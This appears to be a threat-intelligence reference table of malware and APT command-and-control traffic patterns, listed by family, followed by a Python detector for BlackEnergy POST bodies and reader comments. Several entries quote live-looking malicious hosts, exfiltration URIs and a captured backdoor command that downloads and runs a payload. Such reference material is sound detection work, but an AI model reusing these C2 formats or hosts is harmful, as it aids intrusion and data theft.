APT | Letsgo / TabMsgSQL | GET | /indexbak.asp?rands= IXLCGIXELZ&acc=&str= select%20id%20from %20tab_online%20 where%20regc ode%20=%20'IXLCGIXELZ' |
APT | Letsgo / TabMsgSQL | GET | /safe/1.asp?rands=DWLLOXLGLH&acc=vy&str= select%20top%201%20%20 from%20tab_message%20where%20toid%20= %20'198'%20order%20by%20id%20asc |
APT | Letsgo / TabMsgSQL | GET | /safe/1.asp?rands=XJOTLVALQF&acc=vy&str= insert%20into%20tab_online%20 (mode,clientname,clientip,accessip,onlinetime, lasttime,regcode)%20values%20 ('0','victim','192.168.1.12','145.42.112.19', '2011-06-08%2013:45:54', '2011-06-08%2013:45:54','NMQVPTXFBH') |
APT | Letsgo / TabMsgSQL downloader | GET | /new/iistart.html |
APT | Likseput | GET | /index.html |
APT | Lingbo (?) | POST | /windowsupdatev7/search%3 Fhl%3cWABQAFMAUAAzACOAUgA5 ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADI ALgAyADkALgAwAC4AM >QAxADYA%26 meta%3DMDAwMGhIÆÑuMDk %3D%26id%3Dlfdxfircvscxggb |
APT | Luckycat - WIMMIE | POST | /count/count.php?m=c&n=[HOSTNAME]_ |
CRIME | Medfos | GET | /uploading/id=1888546865&u= 4WWbvjA+sJYdYzrNmxr7vmGjfIZ4m ztoS3uBwEbXacviRtjYIg2xcKQMAWYaZM 4RqxalcusDRHEOWDjvdOj3ww== |
APT | MiniASP | GET | /device_ |
APT | MiniASP | GET | /record.asp?device_t= |
APT | Miniduke | POST | /index.php |
APT | Mirage | POST | /resuIt?hl=en&meta=mdlyorvkildpiicqqownoatgvow |
APT | Mirage - later var | GET | /search?hl=en&q=(Removed Base64 string)&meta=acbazuxmhecthlegrepunkkdmpweqtg |
CRIME | Money loader | GET | /get_xml?file_id=25227372 /dwnld/url?u=http://minecraft-goldmods.ru/engine/download.php?id=536 |
APT | Mongal | GET | /3010850A0000F0FD0F003231 3744374432453631363433383338 0044454C4C5854000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000 00000000000000000001000007014C61757261000000000000000 00000000000000000000000000000000000000000000000000000 0000 |
APT | Murcy | GET | /150828 |
APT | Netravler | GET | /fly/2013/2011/nettraveler.asp?action=getcmd&hostid=E81B9088&hostname=DellXT |
APT | Netravler | GET | /fly/2013/2011/nettraveler.asp?hostid=E81B9088&hostname= DellXT&hostip=172.16.253.130&filename=travlerbackinfo-2013-1-14-0-29.dll&filestart=0&filetext=begin::tCvUBC2vGMy3Gu300GKz1EXQa CuRHQgIhFJhMLBUmNNhrtTsN9yhTLJTKhFJs4STgtWw1lvSDEbjIX |
APT | Netravler | GET | /nt2011/zy/nettraveler.asp?hostid=E81B9088&hostname=DellXT& hostip=172.16.253.130&filename=FileList-1006-233757.ini&filestart=0&filetext=begin::OgA1AC2QzebTgdToZTkXQ aCicYTaZR6RDKbDYWCpKKBhM88YjIaj KXLfKOEmQ0nIxm86m46D0YVg::end /nt2012/asp/nettraveler.asp?hostid= 411CD510&hostname=mikepc& amp;hostip=10.12.0.23&filename= travlerbackinfo-2012-1- |
APT | NfLog | GET | /IElog/TestURL.asp HTTP/1.0 |
APT | NfLog | POST | /NfLog/Nfile.asp |
APT | NTESSESS | GET | /6K8gL8.html |
APT | PNG trojan | GET | /index.htm |
APT | Poison Ivy | GET | 256 bytes of seemingly random data after a successful TCP handshake, then 48 byte “keep-alive” requests |
APT | RedOctober AuthInfo | POST | http://%s:%s%s |
APT | RedOctober Sysinfo | POST | /cgi-bin/nt/sk |
APT | RegSubDat | POST | /5501000000/log |
APT | Sanny / Win32.Daws | POST | /write.php |
APT | Seasalt | GET | /postinfo.html |
APT | Sofacy | POST | /~wong/cgi-bin/brvc.cgi?DELLXT88901be8-05_01 |
APT | Sofacy | POST | /~bars/cgi-bin/qfa.cgi?20120311_06:44:06.bin.FFFFFFFFFS |
CRIME | Srizbi | GET | /cb_4.exe |
CRIME | Stabuniq | POST | /rssnews.php |
APT | Sykipot / Wyksol | GET | /kys_allowget.asp?namegetkys.kys |
APT | Taidoor | GET | /apzsr.php?id=021793111D309GE67E |
APT | Tarsip Eclipse | GET | /blg7_8newtpl/image/7/7_12/images/redir?di=130b51e7dc7&prd=bEFU&pver=131&j=1&ck=0 |
APT | Tarsip Moon | GET | /images/icons/2055?meth=gc&tid=2011506&cqe=3878658&inif= qKero9uLh4iCj4eIksvQ1ILS0IfAp6itNvX0dTI19DI19HWyNfU38Crp 7St26ClvsiFiYvAqbW229PI18CuorWo29SF0d8=&syun=230 |
CRIME | Tbot tor | n | |
CRIME | Tinba aka Zusy | POST | /h/index.php |
APT | Vinself | POST | /w880/T19R17Q16/12010L11014 |
CRIME | Vobfus | GET | /XEuPCLrf?e |
APT | WEBC2-Bolid | GET | /firefox.html |
APT | WEBC2-Clover | GET | /Default.asp |
APT | WEBC2-CSON | GET | /Default.aspx?INDEX=<10_random_characters> |
APT | WEBC2-CSON Response to commands | POST | /Default.aspx?ID=IMNQRSSRXK |
APT | WEBC2-HEAD | GET | / |
APT | WEBC2-Table | GET | /order.htm |
CRIME | Xpaj | POST | /DxODlv?LefXWtQIRXkgARPGI=uTUkyVoqbqCvLHFM &ocwPqoQoSasSTJgMh=VutdsgvYkpKpKh |
APT | Xtreme Rat | GET | /1234567890.functions |
APT | Xtreme Rat | GET | /1234567890.functions |
CRIME | Zeus Gameover | GET | /search.php?page=73a07bcb51f4be71 |
CRIME | BitcoinMiner | POST | {"id": 1, "method": "mining.subscribe", "params": ["suckerrr/2.3.2"]} |
CRIME | Blazebot | IRC | NICK USA|94576 USER vtptdwd 0 0 :USA|94576 |
CRIME | Nurjax Adware | GET | /services/rules.txt?dummy=916 |
CRIME | Tosct | GET | Y3vaR7-V0Vj6gdni3YuQapMm84ziJeVnq6JYh44tD nEsVEiZEgOaQwpn1RARQDujk5H r9SUuFwP4oIvv2mp7HEF1VTXRemWB5M kE8mxcxRmV |
CRIME | Nocpos | GET POST | /check/echo /check |
CRIME | OnionDuke | GET | /forum/phpBB3/menu.php?ghdfjk=atccRAyuTJdPy QiNG6pFyBy3ScAf+QicXPsfnlz7HZRZyQiNBqcSjR2mSckfo k/IZeMI3Q6kTfIGpxKNH69dygatW6dP40D CHLd3xAv5CJxX8hGVW/QZnVg= s/sysinfo_7.php /forum/phpBB3/prx_26.php |
APT | Lagulon (Operation Cleaver) | POST | /contador/server.php /i/server.php /includes/server.php |
APT? | Medusa | POST | %s/bbc_mirror/%s/search?id=%s /CNN_Mirror/EN/%s/search?id=%s |00|U|00|n|00|d|00|e|00|r|00 20 00|C|00|o|00|n|0 0|s|00|t|00|r|00|u|00|c|00|t|00|i|00|o|00|n|00 |
CRIME | Toopu | GET | /toopu.png /%s:1048%s /num3.html /web/get_ad3.asp?type=loadall&machinename= /num3_51la.asp |
CRIME | Twerkin | GET | /classes/functions.php?functionname=online /classes/functions.php?functionname=getupdates /classes/functions.php?functionname=getcommand |
CRIME | TzeeBot / TinyZBot | POST | /checkupdate.asmx |
CRIME | XLS URLDownload ToFileA function for Dridex | GET | /koh/mui.php |
CRIME | Quervar / Induc.C / Dorifel | GET | /js/way.php?00021708&pin=7DF38AD66C78A9C3 /404/way.php?00038F50&pin=7DF38AD66C78A9C3 /test/php/way.php?0002E170&pin=7DF38AD66C78A9C3 /1.php?JXU9WXFG&pin=DEC09603F4CEFD80 |
CRIME | Feidowns downloader / Kilim (?) / Cracktools | GET | yeniadmin.php?os=WindowsXP /yeniadmin.php?os=Windows7&osbit=64&antiv /yeniadmin.php?os=Windows7&osbit=64&antiv= Nonti&kart=KotuKart&core=2&mhz=HIZLI http://whos.amung.us/pingjs/?k=yenikazi |
CRIME | GameVance Adware | GET | /aj/updtah.php |
CRIME | OpenShopper Adware | GET | //mmsv/Access3.php //opendb/mmsv.php //mmsv/Access2.php /opapp/postmedia1/Update.dat /opapp/postmedia1/OKUpdate.exe |
CRIME | SoftPulse Adware | GET | /c1tUKWsgnKU-dj1topuyK5IJyJDyPxUcSecVJoVe9_Ia UehZv2XWFP9hUE9WBXK6dtr5pu-_UVXfXoJ EkJ2cXo_DiJQLkxeGA4qJAfSJNXldTCuV5 XTer9cA2OOj_9Le_lq46VOlx6w8QrR0XwefWJguJti H8n4I81acQHcoYVRg aYP43_wbgv6_2Vf3NfFqPD7vqcR-i0 sYMo4Qppk0aw?sbb=% 5B%22%5B%27Ft%22%5D&tt=%5B%277adb505cc a6f3e3ff2d0335ce560ff81665ffe1b%27%5D&lpd=%5B%27w ww.r7wti7bwji.com%27%5D&sbb_check=%5B%271 %27%5D&fileName=%5B%2 7Setup%27%5D |
CRIME | FakeAV | GET | /[...]/load.php?file=uploader /[...]/load.php?file=grabbers /[…]/load.php?file=1 /ohwgx3kiTh/document.doc /ohwgx3kiTh/load.php?file=0 |
CRIME | Wauchos (download by Zbot of Cridex) | POST | /ssdc32716372/file.php /auto*.it/*/jeve.exe //dd*.ru/old.exe |
CRIME | Blackenergy DDos Bot | POST | id=[bot_id]&bid=[base64_encoded_build_ id]&dv=[x]&mv=[y]&dpv=[z] id=[bot_id_sha1]&bid=[base64_encoded_build_ id]&nm=[x]&cn=[y]&num=[z] The only major difference is that the id field contains just the hash instead of the actual string |
CRIME | Alurewo / Alureon pay per click | GET | /click.php?c=f39daf0d969abd8fe186a9656341ed05a4 3d126e9e462ccfdca3a56f8a930786f70c0d48ec6bbc7 f11fa545f5e2926f54123019882b9a3fc4a6a6b 711ae23b8587d1f45d7324667bb5f3e447f05b43c5 |
CRIME | OSX Wirelurker | GET | mac/getversion.php?sn= |
CRIME | Systweak Adware - Systweak RegClean Pro & Advanced System Protector | GET | /getipaddress.asp |
CRIME | MPlug / Multiplug Adware | GET | /?step_id=1&sf=1&installer_id=8605008392702878770 &publisher_id=2356&source_id= 0& page_id=0&affiliate_id= 0&country_code=US&locale=EN&browser_id =4&download_id=7 371188128136903471 &external_id=0&installer_type= IX_2013&hardware_id= 159796436 02580996082&session_id =17077067485576374638&installer _file_name=Doctorow%2C+E +L +-+3+books+.rar&filesize =4.5+MB&product_name= TusFiles&product_title=Doctoro w %2C+E+L+-+3+ books+.rar&product_download _url=http%3A%2F%2Fk.tusfiles.net %2Fd% 2F74la37ldtz2fvxijot2ypuiocogpoue4j7 hnpl5ilkwxlr7gf5ttsjcj%2FDoctorow%2C+E+L+ -+3+books+.ra r&product_file_name=Doctorow %2C+E+L+-+3+books+. rar&project_encod e_id=2356&ttl= 1422295723363&isRedirected= 1&enc_u_p=1&st=0&IX_Startapp= 1&self_ redirect=0&st=0&reffer= http%3A%2F%2Ftusfiles.net %2F&for_html_installer=1&layo ut_id= 8&project_name=TusFiles&uuid=%252A |
CRIME | Nemucod JS | GET | /document.php?id=5451565E011705000B120124031 309050D084A0313114A010011& rnd=212939 1 |
CRIME | Andromeda / Wauchos | POST | /and/gate.php |
CRIME | Poweliks click-fraud | GET | /click?sid=8f75f821c687855c53899112090ed27514c7 49fdcid=0 |
CRIME | Poweliks click-fraud | GET | /click.php?c=3a293fcf1ec6d783daa5c0e6c98d5430fa1 c105d8c9 |
CRIME | Yoddos / Darkshell / YoYoDDoS | 75 71 7a d6 75 8a 8e 92 8f 90 ce 8a 91 cd d6 c8 OR uqz.u... ........ | |
APT | Cobra / Turla | POST | /%s/%s? uid=%d&context=%s&mode=text&data=%s |
APT | Panda | POST | /forum/login.cgi |
APT | Panda | POST | /Photos/Query.cgi?loginid= |
APT | Aided Frame | GET | /img/js.php |
APT | Scanbox Watering hole framework | POST | /i/recv.php |
CRIME | Blackenergy DDos Bot | GET | /upgrade/f3395cd54cf857ddf8f2056768ff49ae/getcfg.php |
APT | Syria Twitter. apk | POST | /contacts |
APT | TinyBaron / Miniduke / CosmicDuke | GET | /modules/db/mgr.php? /modules/db/mgr.php?F=3? |
CRIME? | Moure | GET | /db3Hv2VxYi1kZXhgc29tdWsDZGV6YXM= /HEQ5HoZ2LSxkZWFgc29tdWt9CxUKDg BPLBsfR0kzCxMGHG11ay5k /HUQ-EIdsIWdkcGdnLm9yZ2MyGxEEABR FJR4QDwM5GxUWEnRhbG9n /G1clBYJoKWYuZGZkcm90aWs8C14MChZ SLhodAkIyRxYQFnJvdGlr /GFAmHZhsNmducy1vZXRmdWw_HB8YC h1TbwARHUsjBR4GHHBlbnMu /FkooHoZsNCxkZWtuYm9tb3J9CxUAABFP LAEGR0kzAR0XHG1vci5k |
CRIME | Vundo | GET | /webhp /wpad.dat |
CRIME / APT | Lostdoor RAT | INFO||LostDoor-001|Remote PC|| Windows XP Professional| | |
APT | Protux worm | POST | " http://ruthless.hobby-site.com:80/PHqgHumeay5705.mp3 http://202.71.136.14:80/ggBwkFNqDu1869.avi /newTroy.jpg" /http://Microsoft.dumb1.com:80/PHqgHumeay5705.mp3 |
CRIME | Conficker / Kido worm | GET | / ip checking services |
CRIME | Dingu / Proxy | GET | /1.jpg http://webemail.bounceme.net:8080/directget42.gif |
CRIME | Dyre | GET | /1/manualec.pdf |
CRIME | Zeus | GET | /ycJ2Jj7r4t3wc6y4/ali.jpg |
CRIME | Cryptowall | POST | /tpnofu223t8h8dl |
CRIME | Cryptowall | POST | /4175iq691v3l GET /raw |
CRIME | Galapoper / Tibs Downloader | GET | /pic/tool.jpg /pic/search.jpg /pic/tibs.jpg /pic/proxy.jpg /pic/winlogon.jpg |
APT | Wykcores | GET | /279843 /279859 /280015 /287171 /315171 /110937 /111968 /113000 /114031 /115062 |
ADV | Ads - Zenovia Digital Exchange (not necessarily malicious) | GET | /?wc=Ew5tEwFwAxguBBJxGAoGFggJURMYHHQ= &url=sync%2Ezenoviaexchange%2Ecom%2Fusersync2%2F pubmatic%3F&ref=http%3A%2F%2Fads%2Epubmatic %2Ecom%2FAdServer%2Fjs%2Fshowad%2Ejs |
CRIME | EsFury worm | GET | http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ DATA http://0-1-0-0-0-0-0-1-1-0-0-1 -0-0-0-0-1-0-1-0-1-0-1-0-1-1-1-1-1-1-1-.0-0-0-0-0- 0-0-0-0-0-0-0-0-54-0-0-0-0-0-0-0-0-0-0-0-0-0.info/ VERSION.TXT |
CRIME | PornoAsset / LockEmAll Ransomware | GET | /a.php?f=647&e=2 |
CRIME | FakeAV Privacy Center | GET | /dfgsdfsdf.php /mf.php /css/new-mobile.css /js/wsjs.js /js/caf.js |
CRIME | Zeus V2 (drop zone, config) | GET / POST | /panel3/gotobank.php /panel3/ppnl3.exe /panel3/ppnl3.bin /ppnl3.bin |
CRIME | Blathla / Cadro adware | GET | /1.gif |
CRIME | Vundo / Krap | POST | / |
CRIME | Vundo / Krap | POST | /frame.html?NzRAEyKqWxUtKS1LnKdgRjRlxFowM i8xBARyMj0wLmQGBEcHPzRCAz4wRwI0N EMHyI1AAyQw6So0NA |
CRIME | VOlk bot | GET | /WebPanel/priv8/bots.php?name=john&so=5.01&zila=&mail= HTTP/1.1 User-Agent: vb wininet Host: portalcinemark.us |
CRIME | Oficla / Sasfis | GET | /21/download.php?expid=0&fid=1 /s/download.php?expid=4&fid=1 /l1/bb.php?v=200&id=554905388&b=9468674099&tm=3 /dmr/bb.php?v=200&id=554905388&b=OLD&tm=3 /np/load.php?spl=hcp&b=ff&o=xp&i=hcp /phpbb/image2/cp.php?i=15 |
APT | Pingbed | GET | /default.htm /default1.htm /default2.htm |
APT | Minaps backdoor | GET / POST | /download/device_ad.asp?device_t=80546937 06&key=ptvcrcqz&device_id=ad&cv= ptvcrcqzlyepaudko /download/logo.png /download/record.asp?device_t= 2415079444&key=vgrnuebv&device_id =ad&cv=vgrnuebvhauzshyue&result= %0D%0ATime%3A%09Fri%20Apr%2025%2 013%3A09%3A12%202014%0AAgent%3A%09 Mozilla%2F4.0%20(compatible%3B%20MSIE%206.0%3B%20 Win32%3B%20Microsoft%20Windows%20XP%20Professional%20 Service%20Pack%203%20 (build%202600))%0D%0Aid%20error %21%0D%0Ano%20 command%0D%0Arun%20 http%3A%2F%2FAdobeFlash.info.tm%2F download%2Flogo.png%20setup.exe%09%0D%0A Next%3AFri%20Apr%2025 %2014%3A09%3A14%202014%0Adelay %3A3600%20sec%0D%0A%0D%0A POST /download/device_input.asp?device_t=2437266266&key=zqlameug&device_id=ad&cv=zqlameugaocrxjeqi |
CRIME | QHost / Orsam / Bicololo | GET | /stat/tuk/183 |
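The two BlackEnergy POST body layouts listed in the table (id and bid plus dv/mv/dpv, or id and bid plus nm/cn/num, where id is only the SHA1 hash in the second) can be told apart mechanically from a captured request body. This is an added example, not code from the page or from the DeepEnd Research project; the sample bodies and build-id values are constructed placeholders.

```python
import base64
import re
from urllib.parse import parse_qs

# Key sets taken from the two BlackEnergy POST body variants in the table.
VARIANT_KEYS = {
    "v1": {"id", "bid", "dv", "mv", "dpv"},
    "v2": {"id", "bid", "nm", "cn", "num"},
}
SHA1_HEX = re.compile(r"^[0-9a-f]{40}$", re.IGNORECASE)


def classify_blackenergy_body(body: str):
    """Return (variant, decoded build id) when the body matches one of the
    two key sets, else None. The variants differ only in key names and in
    whether `id` is a SHA1 hex digest (v2) or the raw bot id string (v1)."""
    fields = parse_qs(body, keep_blank_values=True)
    keys = set(fields)
    for variant, expected in VARIANT_KEYS.items():
        if keys != expected:
            continue
        bot_id = fields["id"][0]
        # In the second layout the id field carries just the hash.
        if variant == "v2" and not SHA1_HEX.match(bot_id):
            return None
        try:
            raw = base64.b64decode(fields["bid"][0], validate=True)
            build_id = raw.decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return None
        return variant, build_id
    return None


# Constructed sample bodies (not captured traffic); values are placeholders.
SAMPLE_BODIES = [
    "id=BOT-WIN7-0001&bid=" + base64.b64encode(b"build_01").decode() + "&dv=1&mv=2&dpv=3",
    "id=" + "a" * 40 + "&bid=" + base64.b64encode(b"build_02").decode() + "&nm=x&cn=y&num=4",
    "id=notahash&bid=" + base64.b64encode(b"build_03").decode() + "&nm=x&cn=y&num=4",
    "user=bob&pass=secret",
]


def scan(bodies):
    """Classify each body; None means it matches neither layout."""
    return [classify_blackenergy_body(b) for b in bodies]


if __name__ == "__main__":
    for body, result in zip(SAMPLE_BODIES, scan(SAMPLE_BODIES)):
        print(f"{result!s:<22} {body[:60]}")
```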
This is exceptionally valuable to the community. Thanks for doing this.
Perfect idea!
Do you intend to publish some kind of mailing list that informs us when your database is added to?
What do you do when requests are encrypted, or use GET/POST on a port other than 80?
Thanks
Hi there, no, we plan it to be low maintenance: see pattern = add; need to reference = visit the link. People have enough spam in their mailboxes, and there is no easy way for us to deal with the mailings.
Some of these are on port 443 and others.
We might add a port column, but also see the links with publications; they show and explain much more than the table, which is just a lookup reference. Thank you.
Absolutely Spectacular!
Awesome stuff, seriously! Mila and Andre' - keep up the fantastic work!!!
Good stuff. Keep up the great work!!
Thank you for the good feedback!
The fact is that Malsubjects will continue to cause havoc in cyberspace using everything they have in their power. It is time that we all realize that we are fighting a cyberwar where in many cases the malsubjects are winning many of these battles. It's about time we defend ourselves with ALL we've got!
I may have overlooked it, but is the password for the newly downloadable pcaps posted anywhere?
Thanks,
You don't need a password to download the spreadsheet itself: go to File - Save As (might need to use a Gmail account, not sure). But for the malware and pcap downloads it is the same scheme as on Contagiodump.blogspot.com; please email Mila for the password scheme (click on the name above in the post and replace (at) with @).
Very useful, it's rare to find resources this good on APT.
It's a great pleasure that you share the malware pcap files with the public. I have emailed you for the password; I hope you reply soon. Thank you very much. Those pcap files will help me to further my study of APT research.
Amazing resource! Thank you so much.
This is amazing, thank you.
Thank you so much for taking the time to share this information. A great read. I'll certainly be back.